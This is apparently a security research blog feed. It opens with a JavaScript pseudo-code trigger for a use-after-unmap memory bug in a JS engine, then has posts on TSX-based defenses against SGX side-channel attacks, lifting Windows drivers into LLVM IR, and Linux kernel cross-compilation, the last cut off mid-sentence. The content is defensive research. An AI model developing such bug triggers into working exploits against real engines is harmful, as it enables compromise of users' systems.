<div class="highlight"><pre><span></span><code><span class="kd">function</span><span class="w"> </span><span class="nx">test</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">function</span><span class="w"> </span><span class="nx">a</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">function</span><span class="w"> </span><span class="nx">d</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="nx">e</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kd">function</span><span class="p">()</span><span class="w"> </span><span class="p">{};</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">e</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="kd">function</span><span class="w"> </span><span class="nx">b</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="nx">fun_d</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="nx">d</span><span class="p">];</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">fun_d</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">obj</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="nx">big</span><span class="o">-</span><span class="nx">size</span><span class="w"> </span><span class="nx">object</span><span class="p">]</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">b</span><span class="p">();</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">a</span><span class="p">();</span>
<span class="p">}</span>
<span class="kd">var</span><span class="w"> </span><span class="nx">f</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nx">test</span><span class="p">();</span>
<span class="kd">function</span><span class="w"> </span><span class="nx">test1</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">obj</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="nx">big</span><span class="o">-</span><span class="nx">size</span><span class="w"> </span><span class="nx">object</span><span class="p">]</span><span class="w"> </span><span class="c1">// reallocate for use-after-unmap.</span>
<span class="w"> </span><span class="nx">print</span><span class="p">(</span><span class="nx">f</span><span class="p">[</span><span class="mf">0</span><span class="p">]);</span><span class="w"> </span><span class="c1">// function d still points the address on stack as it is not boxed.</span>
<span class="p">}</span>
<span class="nx">test1</span><span class="p">();</span>
</code></pre></div>TSX-based Defenses Against SGX Side-channel Attacks2018-06-26T00:00:00+02:002018-06-26T00:00:00+02:00Ming-Wei Shihtag:gts3.org,2018-06-26:/2018/tsgx-defense.html<p>Discuss why side-channel attacks are serious threats to SGX and
how existing TSX-based defenses effectively mitigate them.</p><h2>Limitations of traditional side-channel attacks</h2>
<p>Instead of compromising software by exploiting its vulnerabilities, one way
to infer the sensitive data of bug-free software is using side-channel attacks.
However, in traditional settings (e.g., cloud environments), communities do not
consider side-channel attacks as serious security problems because these attacks
generally suffer from the following limitations.</p>
<ol>
<li>
<p><strong>Strict prerequisites.</strong>
To successfully launch a side-channel attack, an attacker has to meet several
requirements that are difficult to satisfy in practice.
For instance, Flush+Reload cache attacks require
spy (under the control of the attacker) and victim programs to be located
in the same physical CPU core. Moreover, the spy program needs to
know the addresses of the shared libraries used by the victim
program. To improve the accuracy and resolution of the attack,
the spy program has to synchronize with the execution of
the victim program that is of interest (e.g., processing sensitive data).</p>
</li>
<li>
<p><strong>High levels of noise.</strong>
Measuring side-channel information suffers from high levels of noise.
The sources of the noise include both the underlying system (i.e., the OS kernel)
and other concurrent programs. That is, the OS kernel and other concurrent programs
can share the CPU caches with victim and spy programs, and therefore easily
interfere the states of the caches. As a result, the spy program, which
launches cache-based attacks, can obtain noisy information.</p>
</li>
<li>
<p><strong>Low temporal resolution.</strong>
With only the control over the spy program, the attacker can
affect (i.e., slow down) the execution time of the victim program.
As a result, the frequency of side-channel probing, which depends
on how the OS schedules the spy and victim programs, is
relatively low. Such low temporal resolution of the information
makes the attacks less effective in practice.</p>
</li>
</ol>
<p>One root cause of the abovementioned limitations in traditional settings
is its weak adversary model; that is, in a cloud-like environment,
an attacker has no privilege to control the entire environment.
Instead, the attacker is only able to rent a VM
that is possibly co-located with a victim VM, and
run a spy program inside that VM to target a program inside the victim VM.
This inherently suffers from all the limitations.</p>
<h2>Why are SGX side-channel attacks more serious?</h2>
<p>The weak adversary model significantly limits the capabilities of side-channel
attacks and, more importantly, assuming a strong adversary model does not make
sense in most of the practical scenarios. For example, although an attacker who
has the control over an OS can overcome the abovementioned limitations and launch
effective side-channel attacks against a victim program. However, given such
high privilege, the attacker can directly extract sensitive data from the
victim program; that is, the strong attacker generally does not need to rely on
side channels at all.</p>
<p>However, this is not the case in the context of Intel Software Guard Extensions
(SGX). The high-level goal of SGX is to protect a user-space program in a
hostile environment (e.g., a public cloud in which administrators are
untrusted). More specifically, SGX protects the program from all privileged
accesses including those from an OS and a hypervisor. Unfortunately, the design
of SGX does not consider side-channel attacks, and therefore the program is
still vulnerable to this type of attacks.</p>
<p>Given that an SGX-protected program is still vulnerable to side-channel attacks,
the SGX's strong adversary model (e.g., an attacker controls the underlying OS)
allows powerful attacks with all the limitations
addressed. More specifically, the attacker can easily meet the prerequisites of
attacks by having control over the entire system. In addition, the attacker
can apply several noise reduction techniques (e.g., running the program in an isolated
core) according to the type of side channel. To improve the temporal resolution
of attacks, the attacker can slow down and/or frequently interrupt the execution of
the program (i.e., achieve near single-stepping).</p>
<p>By taking advantage of the strong adversary model, communities have proposed several
side-channel attacks against SGX that bypass its protection.
These attacks demonstrate not only a new type of side channels
but also significant improvement over the traditional ones.
We summarize the state-or-the-art attacks against SGX in the following table.</p>
<center>
<table border="1" width="80%">
<tr align="centr">
<th width="40%">Attack</th>
<th width="25%">Source</th>
<th width="15%">Granularity</th>
<th width="20%">High-freq interrupt</th>
</tr>
<tr align="center">
<td>Controlled-channel attacks [1]</td>
<td>Page faults</td>
<td>Page</td>
<td>No</td>
</tr>
<tr align="center">
<td>Stealthy page-table-based attacks [2]</td>
<td>Page-table flags</td>
<td>Page</td>
<td>Yes</td>
</tr>
<tr align="center">
<td>Branch Shadowing [3]</td>
<td>Branch target buffer/Branch predictor</td>
<td>Branch</td>
<td>Yes</td>
</tr>
<tr align="center">
<td>BranchScope [4]</td>
<td>Branch predictors</td>
<td>Branch</td>
<td>Yes</td>
</tr>
<tr align="center">
<td>Last-level cache attacks [5]</td>
<td>Last-level caches</td>
<td>Cacheline</td>
<td>No</td>
</tr>
<tr align="center">
<td>L1 cache attacks without Hyperthread [6]</td>
<td>L1 caches</td>
<td>Cacheline</td>
<td>Yes</td>
</tr>
<tr align="center">
<td>L1 cache attacks with Hyperthread [7]</td>
<td>L1 caches</td>
<td>Cacheline</td>
<td>No</td>
</tr>
<tr align="center">
<td>TLB-based attacks [8]</td>
<td>TLB</td>
<td>Page</td>
<td>Yes</td>
</tr>
</table>
</center>
<!--
Controlled-channel attacks unmap a code/data page and wait
for an SGX-protected program access the page while
Stealthy page-table-based attacks clear the A/D flags of a
code/data page and keep monitoring the change of the flags.
To clear the flags, the attack has to flush the TLB, which
results in interrupting the program. Therefore, frequent
interrupts are essential to the stealthy attacks.
-->
<!--
Page-table-based attacks are a new type of side-channel attacks
that are only available under the strong adversary model.
-->
<h2>TSX-based defenses</h2>
<p>Defending against side-channel attacks under the strong
adversary model is not an easy task. System-level approaches
(e.g., isolating the source of side channels for a program)
are not applicable because the OS is untrusted.
Although software-based approaches (e.g., ORAM) are
effective, they generally incur significant runtime
overhead. Hardware-based approaches are both
effective and efficient, but they are expensive and may take too
much time to be adopted and deployed.</p>
<p>With the goal of having practical defenses, communities have explored
an alternative approach that relies on an existing hardware feature:
Intel Transaction Synchronization Extensions (TSX).
The original purpose of TSX is to enable
hardware-based transactional memory. More specifically, TSX allows developers
to put a piece of code inside a transaction that ensures the atomicity of
memory accesses made by the code. When the TSX detects events that violate
the atomicity, it aborts the on-going transaction and invokes a user-space
fallback handler without notifying the underlying OS. The key observation
from communities is that these events include ones that are required by
side-channel attacks.</p>
<p>The first proposal of TSX-based approach is T-SGX [9], which
targets mainly the controlled-channel (page-fault-based) attacks.
The key property of TSX that T-SGX utilizes is that TSX aborts
an on-going transaction when a page fault occurs while suppressing
it (i.e., the page fault is not delivered to the OS).
Based on this property, T-SGX transforms a program during
compile time to ensure the entire program is covered by
multiple transactions. This approach effectively mitigates the
controlled-channel attacks.</p>
<p>In addition to suppressing page faults, another important
property of TSX is that it also aborts transactions
when there are interrupts. According to the table in the previous section,
frequent interrupts are essential to most of the side-channel attacks. For example,
although the stealthy page-table-based attacks avoid the need of
page faults and infer the page accesses through monitoring page-table
flags (e.g., dirty and access bits), the attacks still require
frequent interrupts to flush the TLB and clear the flags.
For cache-, branch-prediction-, and TLB-based attacks, frequent interrupts
are also necessary to obtain fine-grained information (i.e.,
achieve high temporal resolution).
With the capability of detecting interrupts, an SGX-protected program
can detect abnormally high-frequent interrupts, and
therefore effectively mitigate the attacks.</p>
<p>For cache-based attacks that do not require frequent
interrupts, another TSX-based approach, Cloak [10],
utilizes the distinct property of TSX: aborting a transaction
when a cache conflict occurs (e.g., eviction).
Causing cache eviction is essential for cache-based attacks
(e.g., using Prime+Probe) against SGX because
SGX does not share its memory with other programs by design
(i.e., there is no Flush+Reload attack).
Cloak ensures that
a concurrent cache eviction on sensitive data always results
in aborting an on-going transaction by including all the sensitive
data in a transaction. As a result, Cloak allows an SGX-protected
program to detect malicious cache eviction, and thus mitigates
the cache-based attacks that do not require interrupts.</p>
<center>
<table border="1" width="80%">
<tr align="centr">
<th width="40%">Attack</th>
<th width="25%">Source</th>
<th width="15%">Granularity</th>
<th width="20%">High-freq interrupt</th>
</tr>
<tr align="center">
<td>Controlled-channel attacks [1]</td>
<td bgcolor="#58D68D">Page faults</td>
<td>Page</td>
<td>No</td>
</tr>
<tr align="center">
<td>Stealthy page-table-based attacks [2]</td>
<td>Page-table flags</td>
<td>Page</td>
<td bgcolor="#58D68D">Yes</td>
</tr>
<tr align="center">
<td>Branch Shadowing [3]</td>
<td>Branch target buffer</td>
<td>Branch</td>
<td bgcolor="#58D68D">Yes</td>
</tr>
<tr align="center">
<td>BranchScope [4]</td>
<td>Branch predictors</td>
<td>Branch</td>
<td bgcolor="#58D68D">Yes</td>
</tr>
<tr align="center">
<td>Last-level cache attacks [5]</td>
<td bgcolor="#F7DC6F">Last-level caches</td>
<td>Cacheline</td>
<td>No</td>
</tr>
<tr align="center">
<td>L1 cache attacks without Hyperthread [6]</td>
<td bgcolor="#F7DC6F">L1 caches</td>
<td>Cacheline</td>
<td bgcolor="#58D68D">Yes</td>
</tr>
<tr align="center">
<td>L1 cache attacks with Hyperthread [7]</td>
<td bgcolor="#F7DC6F">L1 caches</td>
<td>Cacheline</td>
<td>No</td>
</tr>
<tr align="center">
<td>TLB-based attacks [8]</td>
<td>TLB</td>
<td>Page</td>
<td bgcolor="#58D68D">Yes</td>
</tr>
</table>
</center>
<p>The above table summarizes the TSX-based defenses against state-of-the-art side-channel
attacks against SGX. The green and yellow indicate the protection provided by T-SGX and Cloak,
respectively. Combining both approaches can already effectively mitigate all the attacks.</p>
<h2>Takeaway</h2>
<p>Most of the studies underlook the effectiveness of T-SGX because its main focus
is to defend against controlled-channel attacks. Note that controlled-channel
attacks were the only known attacks at the time T-SGX was proposed. However, the feature of
disallowing frequent interrupts effectively prevents attackers from obtaining
side-channel information with high temporal resolution, and therefore
mitigating many later-introduced attacks.
Moreover, because all the other known attacks that do not
require interrupts are based on the cache, Cloak shows that using TSX
also effectively prevents them. As a result, we conclude that, by using TSX-based
defenses, the advantage of launching side-channel attacks with the strong adversary
model no longer holds. One may argue that TSX-based defenses still have
some flaws. Indeed, this is because TSX is not designed to use in these ways.
However, these approaches already raise the bar enough for making state-of-the-art attacks
impractical (i.e., similar to the traditional ones), and we expect to see a similar
hardware-based feature that dedicates for defending side-channel attacks in the future.</p>
<h2>Reference</h2>
<p>[1] Y. Xu, W. Cui, and M. Peinado. "Controlled-channel attacks: Deterministic side channels for untrusted operating systems." In Proceedings of the 36th IEEE Symposium on Security and Privacy (Oakland), San Jose, CA, May 2015.</p>
<p>[2] J. V. Bulck, N. Weichbrodt, R. Kapitza, F. Piessens, R. Strackx. "Telling Your Secrets without Page Faults: Stealthy Page Table-Based Attacks on Enclaved Execution." In Proceedings of the 26th USENIX Security Symposium (Security), Vancouver, BC, Canada, Aug. 2017.</p>
<p>[3] S. Lee, M.-W. Shih, P. Gera, T. Kim, H. Kim, and M. Peinado. "Inferring Fine-grained Control Flow Inside SGX Enclaves with Branch Shadowing." In Proceedings of the 26th USENIX Security Symposium (Security), Vancouver, BC, Canada, Aug. 2017.</p>
<p>[4] D. Evtyushkin, R. Riley, N. Abu-Ghazaleh, and D. Ponomarev. "BranchScope: A new side-channel attack on directional branch predictor." In Proceedings of the 23rd ACM International Conference on Architectural Support for Programming Languages and Operating Systems (ASPLOS), Williamsburg, VA, Mar. 2018.</p>
<p>[5] M. Schwarz, S. Weiser, D. Gruss, C. Maurice, and S. Mangard. "Malware guard extension: Using SGX to conceal cache attacks." In Proceedings of the 14th Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA), 2017.</p>
<p>[6] M. Hähnel, W. Cui, and M. Peinado. High-Resolution Side Channels for Untrusted Operating Systems. In Proceedings of the 2017 USENIX Annual Technical Conference (ATC), Santa Clara, CA, July 2017.</p>
<p>[7] F. Brasser, U. Müller, A. Dmitrienko, K. Kostiainen, S. Capkun, and A. Sadeghi. Software Grand Exposure: SGX Cache Attacks Are Practical. In Proceedings of the 11th USENIX Workshop on Offensive Technologies (WOOT), Vancouver, BC, Canada, Aug. 2017.</p>
<p>[8] W. Wang, G. Chen, X. Pan, Y. Zhang, X. Wang, V. Bindschaedler, H. Tang, and C. A. Gunter. "Leaky cauldron on the dark land: Understanding memory side-channel hazards in SGX." In ACM SIGSAC Conference on Computer and Communications Security, 2017.</p>
<p>[9] M.-W. Shih, S. Lee, T. Kim, and M. Peinado. "T-SGX: Eradicating Controlled-Channel Attacks Against Enclave Programs." In Proceedings of the 2017 Annual Network and Distributed System Security Symposium (NDSS), San Diego, CA, Feb.–Mar. 2017.</p>
<p>[10] D. Gruss, J. Lettner, F. Schuster, O. Ohrimenko, I. Haller, and M. Costa. "Strong and Efcient Cache Side-Channel Protection using Hardware Transactional Memory." In Proceedings of the 26th USENIX Security Symposium (Security), Vancouver, BC, Canada, Aug. 2017.</p>Lifting Windows Driver Binaries into LLVM IR2017-10-30T00:00:00+01:002017-10-30T00:00:00+01:00Dhaval Kapiltag:gts3.org,2017-10-30:/2017/win-lift.html<p>Walkthrough on lifting Windows driver binaries into LLVM IR</p><h2>Introduction</h2>
<p>The <a href="https://llvm.org/">LLVM</a> Compiler Infrastructure is built to provide
reusable compiler and toolchain components. The intermediate representation
used by LLVM, named LLVM IR, is the basis for various kinds of analysis and
instrumentations, both static and dynamic.</p>
<p>For open-source software and operating systems,
<a href="https://clang.llvm.org/">Clang</a>, the front-end for languages in the
C-family, can be leveraged to convert C/C++ source code into LLVM IR,
making it possible for doing security analysis on these software and
systems.</p>
<p>However, in many situations, we do not always have the source code.
One example is the Windows operating system, especially for the
binaries that come with the system kernel such as the device drivers.</p>
<p>This restricts the kind of analysis that one can perform. Hence, there
is definitely a need for lifting LLVM directly from binaries.
In this post, I'm going to talk about lifting LLVM IR from 64-bit
x86 Windows binaries.</p>
<h2>McSema (by Trail of Bits)</h2>
<p><a href="https://www.trailofbits.com/">Trail of Bits</a> has developed a framework
called <a href="https://github.com/trailofbits/mcsema">McSema</a> for translating
compiled code to LLVM bitcode. It supports both x86 and amd64 architectures
and can be used for Linux as well as Windows binaries.
The translated LLVM IR can even be recompiled as a completely new
executable with the exact same functionalities.</p>
<p>However, the LLVM bitcode generated by McSema kinds of mimics the
disassembly of the compiled code. Each function's signature, that is
lifted off, follows a particular pattern:</p>
<div class="highlight"><pre><span></span><code><span class="p">;</span><span class="w"> </span><span class="nx">Function</span><span class="w"> </span><span class="nx">Attrs</span><span class="p">:</span><span class="w"> </span><span class="nx">noinline</span><span class="w"> </span><span class="nx">nounwind</span>
<span class="nx">define</span><span class="w"> </span><span class="nx">internal</span><span class="w"> </span><span class="nx">fastcc</span><span class="w"> </span><span class="o">%</span><span class="nx">struct</span><span class="p">.</span><span class="nx">Memory</span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="nx">sub_1c0017f64</span><span class="p">(</span><span class="o">%</span><span class="nx">struct</span><span class="p">.</span><span class="nx">State</span><span class="o">*</span><span class="w"> </span><span class="nx">dereferenceable</span><span class="p">(</span><span class="mi">2688</span><span class="p">)</span><span class="w"> </span><span class="o">%</span><span class="nx">state2</span><span class="p">,</span><span class="w"> </span><span class="kt">i64</span><span class="w"> </span><span class="o">%</span><span class="nx">pc</span><span class="p">,</span><span class="w"> </span><span class="o">%</span><span class="nx">struct</span><span class="p">.</span><span class="nx">Memory</span><span class="o">*</span><span class="w"> </span><span class="o">%</span><span class="nx">memory1</span><span class="p">)</span><span class="w"> </span><span class="nx">unnamed_addr</span>
</code></pre></div>
<p>The first parameter (<code>%state2</code>) captures the internal state, including
all the registers. This format is not easy to analyze since it is more
like reading the disassembling. Additional work needs to be done to
recover function semantics from the LLVM bitcode generated by McSema.</p>
<h2>Recovering Function Semantics</h2>
<p>For recovering function semantics, we need to look at <code>%struct.State</code>.
The LLVM file generated also provides the following definition:</p>
<div class="highlight"><pre><span></span><code><span class="nf">%struct</span><span class="p">.</span><span class="n">State</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">type</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nf">%struct</span><span class="p">.</span><span class="n">ArchState</span><span class="p">,</span>
<span class="w"> </span><span class="p">[</span><span class="mi">32</span><span class="w"> </span><span class="n">x</span><span class="w"> </span><span class="nf">%union</span><span class="p">.</span><span class="n">VectorReg</span><span class="p">],</span>
<span class="w"> </span><span class="nf">%struct</span><span class="p">.</span><span class="n">ArithFlags</span><span class="p">,</span>
<span class="w"> </span><span class="nf">%union</span><span class="p">.</span><span class="n">Flags</span><span class="p">,</span>
<span class="w"> </span><span class="nf">%struct</span><span class="p">.</span><span class="n">Segments</span><span class="p">,</span>
<span class="w"> </span><span class="nf">%struct</span><span class="p">.</span><span class="n">AddressSpace</span><span class="p">,</span>
<span class="w"> </span><span class="nf">%struct</span><span class="p">.</span><span class="n">GPR</span><span class="p">,</span><span class="w"> </span><span class="err">#</span><span class="w"> </span><span class="n">General</span><span class="w"> </span><span class="n">purpose</span><span class="w"> </span><span class="n">registers</span>
<span class="w"> </span><span class="nf">%struct</span><span class="p">.</span><span class="n">X87Stack</span><span class="p">,</span>
<span class="w"> </span><span class="nf">%struct</span><span class="p">.</span><span class="n">MMX</span><span class="p">,</span>
<span class="w"> </span><span class="nf">%struct</span><span class="p">.</span><span class="n">FPUStatusFlags</span><span class="p">,</span>
<span class="w"> </span><span class="nf">%union</span><span class="p">.</span><span class="n">Flags</span>
<span class="p">}</span>
</code></pre></div>
<p><code>%struct.GPR</code> represents all the general purpose registers.
Here, we only consider 64-bit Windows binaries.
While calling a function, the first four parameters are put inside
registers <code>rcx</code>, <code>rdx</code>, <code>r8</code> and <code>r9</code>. The rest of the parameters are
pushed on the stack. This is how this struct is defined:</p>
<div class="highlight"><pre><span></span><code>struct alignas(8) GPR final {
.
.
volatile uint64_t _0;
Reg rax; // 1
volatile uint64_t _1;
Reg rbx; // 3
volatile uint64_t _2;
Reg rcx; // 5
volatile uint64_t _3;
Reg rdx; // 7
.
.
volatile uint64_t _6;
Reg rsp; // 13
volatile uint64_t _7;
Reg rbp; // 15
volatile uint64_t _8;
Reg r8; // 17
volatile uint64_t _9;
Reg r9; // 19
.
.
} __attribute__((packed));
</code></pre></div>
<p>The complete definition can be viewed <a href="https://github.com/trailofbits/remill/blob/24f9ebcde1cb69503b67c437c31c22de035d2050/remill/Arch/X86/Runtime/State.h#L455">here</a>.
The parameters in the registers are referenced by their pointers returned
using <code>getelementptr</code> instruction. For example, the following instruction
returns a pointer to <code>rcx</code>, i.e. the first parameter of the function:</p>
<div class="highlight"><pre><span></span><code><span class="c">%3 = getelementptr inbounds %struct.State, %struct.State* %state2, i64 0, i32 6, i32 5, i32 0</span>
</code></pre></div>
<p>Parameters on the stack are referenced in a slightly complex manner.
First, the <code>rsp</code> register value is loaded. As seen from the above
structure, <code>rsp</code> is present at index 13.</p>
<div class="highlight"><pre><span></span><code><span class="o">%</span><span class="mi">11</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getelementptr</span><span class="w"> </span><span class="n">inbounds</span><span class="w"> </span><span class="o">%</span><span class="n">struct</span><span class="o">.</span><span class="n">State</span><span class="p">,</span><span class="w"> </span><span class="o">%</span><span class="n">struct</span><span class="o">.</span><span class="n">State</span><span class="o">*</span><span class="w"> </span><span class="o">%</span><span class="n">state2</span><span class="p">,</span><span class="w"> </span><span class="n">i64</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">i32</span><span class="w"> </span><span class="mi">6</span><span class="p">,</span><span class="w"> </span><span class="n">i32</span><span class="w"> </span><span class="mi">13</span><span class="p">,</span><span class="w"> </span><span class="n">i32</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">i32</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="c1"># A pointer to rsp</span>
<span class="o">%</span><span class="mi">14</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">load</span><span class="w"> </span><span class="n">i64</span><span class="p">,</span><span class="w"> </span><span class="n">i64</span><span class="o">*</span><span class="w"> </span><span class="o">%</span><span class="mi">11</span><span class="p">,</span><span class="w"> </span><span class="n">align</span><span class="w"> </span><span class="mi">8</span><span class="w"> </span><span class="c1"># The value loaded in rsp</span>
</code></pre></div>
<p>The fifth parameter is at offset <code>rsp + 40</code> on the stack.
The sixth parameter is at <code>rsp + 48</code> and so on.</p>
<div class="highlight"><pre><span></span><code><span class="c">%15 = add i64 %14, 40 # A pointer to the value at 'rsp + 40'</span>
</code></pre></div>
<p>While calling other functions, the same structure <code>%state2</code> is passed.
However, the individual registers are modified to update the parameters
using <code>store</code> instructions. Also, the stack grows downwards (to lower
memory addresses) by modifying the <code>rsp</code> register.
After the first four parameters, the rest are setup up accordingly on
the stack. The following example shows how the first parameter is modified
while calling another function:</p>
<div class="highlight"><pre><span></span><code><span class="c">%9 = getelementptr inbounds %struct.State, %struct.State* %state2, i64 0, i32 6, i32 5, i32 0, i32 0 # A pointer to rcx, the first parameter</span>
<span class="c">%87 = add i64 %85, 112 # Computed the parameter to be passed</span>
<span class="n">store</span><span class="w"> </span><span class="s">i64</span><span class="w"> </span><span class="s">%87,</span><span class="w"> </span><span class="s">i64*</span><span class="w"> </span><span class="s">%9,</span><span class="w"> </span><span class="s">align</span><span class="w"> </span><span class="s">8,</span><span class="w"> </span><span class="s">!tbaa</span><span class="w"> </span><span class="s">!849</span><span class="w"> </span><span class="s">#</span><span class="w"> </span><span class="s">Storing</span><span class="w"> </span><span class="s">the</span><span class="w"> </span><span class="s">value</span><span class="w"> </span><span class="s">in</span><span class="w"> </span><span class="s">the</span><span class="w"> </span><span class="s">pointer</span><span class="w"> </span><span class="s">to</span><span class="w"> </span><span class="s">rcx</span>
#<span class="w"> </span><span class="n">A</span><span class="w"> </span><span class="n">call</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">sub_140002ad0</span>
<span class="c">%92 = tail call fastcc %struct.Memory* @sub_140002ad0(%struct.State* nonnull %state2, i64 %88, %struct.Memory* %MEMORY.0)</span>
</code></pre></div>
<h2>A Two-pass Approach</h2>
<p>To recover the function semantics from the LLVM bitcode generated by
McSema, we use two passes over every LLVM module. The following is
calculated for <em>every</em> function:</p>
<ul>
<li>A 'set' of <code>Instruction</code> for every parameter being used by the function.
A particular parameter may be referenced by more than one pointers within
the same function. The set represents all such possible pointers.</li>
<li>A list of functions that it calls.</li>
<li>For every function in the above list, a list of parameter values being
passed to that function. Note that, there will always be a unique <code>Value</code>
being passed so there is no notion of 'set' here.</li>
</ul>
<p>Apart from this, the following information is also maintained for <em>every</em>
function between the two passes:</p>
<ul>
<li>A 'list' of <code>Instruction</code> that are pointers to <code>rsp</code> within the <code>%state2</code>
structure.</li>
<li>A 'list' of <code>Instruction</code> that contain actual <code>rsp</code> values 'loaded' from
one of the above pointers.</li>
<li>For every <code>rsp</code> value loaded above, the corresponding offset of <code>rsp</code> from
the value of <code>rsp</code> at the start of the function.</li>
<li>For every function that is being called, the corresponding <code>rsp</code> offset
being passed.</li>
</ul>
<h3>First Pass</h3>
<p>The first pass iterates over the instructions sequentially.
The responsibility of this pass is to get the list of parameters being
used by this function and also to keep a track of the stack pointer.
The following type of instructions are taken into consideration:</p>
<ol>
<li><strong>GetElementPtrInst</strong>: These instructions are used to retrieve pointers
to various registers from the <code>%state2</code> structure. Pointers to the first
four parameters (<code>rcx</code>, <code>rdx</code>, <code>r8</code>, <code>r9</code>) along with the
stack pointer (<code>rsp</code>) are saved.</li>
<li><strong>CallInst</strong>: All function calls to other functions present in the
bitcode are recorded. The current <code>rspOffset</code> is also recorded. Also, every
function call leads to an increase in the increase of the stack pointer
by 8 bytes.</li>
<li><strong>BitCastInst</strong>: If the source of a <strong>BitCastInst</strong> is a recorded pointer
to a parameter, the target of the instruction is also added to the same set,
since both reference the same parameter.</li>
<li><strong>LoadInst</strong>: If a value is being loaded from a pointer to <code>rsp</code>
(stored above), the corresponding target is recorded along with the
current <code>rspOffset</code>.</li>
<li><strong>StoreInst</strong>: If a value is being stored as the new stack pointer
(<code>rsp</code>) in <code>%state2</code>, the source must be a value pointing somewhere on
the stack. The <code>currentOffset</code> is updated accordingly.</li>
<li><strong>BinaryOperator</strong>: Operations on pointers on the stack are performed
using this instruction. A new pointer on stack is generated using an
existing pointer. Now, this pointer may point to one of the parameters
being passed to the coming functions and is recorded accordingly.</li>
</ol>
<h3>Second Pass</h3>
<p>Similar to the first pass, the second pass also iterated over the
instructions sequentially. The responsibility of this pass is to keep
a track of the current state of parameters and associate them with
functions that are called. The following types of instructions are taken
into consideration:</p>
<ol>
<li><strong>IntToPtrInst</strong>: If the source of this instruction is a pointer on
the stack, so is the target.</li>
<li><strong>StoreInst</strong>: Parameters are stored in <code>%state2</code> using this instruction.
The target operand is checked for either of the four parameter registers
(<code>rcx</code>, <code>rdx</code>, <code>r8</code>, <code>r9</code>) and <code>currentParams</code> is updated accordingly.
This instruction is also used to store some parameter on stack. If the
target operand is any pointer on the stack, the value pushed is recorded.</li>
<li><strong>Callinst</strong>: At this point, a function call is being made
and <code>currentParams</code> store the state of the first four parameters being passed.
Also, the values pushed on stack earlier are treated as parameters and
also recorded with the target function.</li>
</ol>
<p>Using these two passes we now have a complete list of all parameters
being passed to any function. We also have the parameters that a function
passes to other functions.</p>
<p align="right">Proofread by Meng Xu</p>Linux Kernel Cross Compilation2017-10-06T00:00:00+02:002017-10-06T00:00:00+02:00Meng Xutag:gts3.org,2017-10-06:/2017/cross-kernel.html<p>Experience in cross-compiling the Linux kernel</p><h2>Introduction</h2>
<p>There are several reasons to cross-compile the Linux kernel: </p>
<ol>
<li>
<p>Compiling on a native CPU and hardware requires a wide range of
devices, which is not so practical. Furthermore, the actual hardware
is often not suitable for the workload of kernel compilation due to
a slow CPU, small memory, etc.</p>
</li>
<li>
<p>Hardware emulation (e.g., with <code>qemu</code>) can be a viable substitution
if the slowness can be tolerated.
However, how to setup the compilation environment is another challenge,
as it requires at least a preferably Linux-flavored OS, the <code>bash</code> and
<code>make</code> ecosystem, and most importantly, the <em>toolchain</em>.</p>
</li>
<li>
<p>Cross-compiling on a powerful host enables quick detection of kernel
compile errors and config errors, as shown in the
<a href="http://server.roeck-us.net:8010/builders">stable queue builds project</a>.
Coupled with emulation, testing on non-native architectures becomes
easier as well.</p>
</li>
</ol>
<p>For my personal use, I would like to see the kernel build process on
each architecture, capture the compilation flags of each files, collect
their linking information, and finally see if I can mine some insights
out of it.
In this case, given the complexity of parsing the <code>Kconfig</code> and
<code>Makefile</code>, probably the best way is to actually build the kernel
and dump the verbose version of the build log.</p>
<p>Fortunately, with a modern Linux release (like Ubuntu or Fedora), all
we need to cross-compile the kernel is a <em>toolchain</em> that can produce
binaries for another CPU architecture.</p>
<h2>Toolchain</h2>
<p>On cross-compiling the kernel, we only need two things: <code>binutils</code>,
and <code>gcc</code>, and there are generally two ways to obtain them: </p>
<ol>
<li>install pre-compiled packages </li>
<li>build from source</li>
</ol>
<p>Installing pre-compiled packages can be a hassle-free way if you don't
want to get your hands dirty. In fact, for the following architectures:
<em>arm, aarch64, hppa, hppa64, m68k, mips, mips64, powerpc, powerpc64,
s390x, sh4, sparc64</em>,
you can directly obtain them via <code>apt-get</code> from the official repositories.
For example, </p>
<div class="highlight"><pre><span></span><code>apt-get<span class="w"> </span>install<span class="w"> </span>binutils-aarch64-linux-gnu<span class="w"> </span>gcc-aarch64-linux-gnu
</code></pre></div>
<p>Toolchains for other architectures such as <em>blackfin</em>, <em>c6x</em>, and <em>tile</em>
can be obtained from the Fedora repo and converted to <em>.deb</em> packages
as shown in the <a href="http://events.linuxfoundation.org/sites/events/files/slides/Shuah_Khan_cross_compile_linux.pdf">tutorial in 2013</a>.</p>
<p>However, in case you want to compile the toolchain from source, for
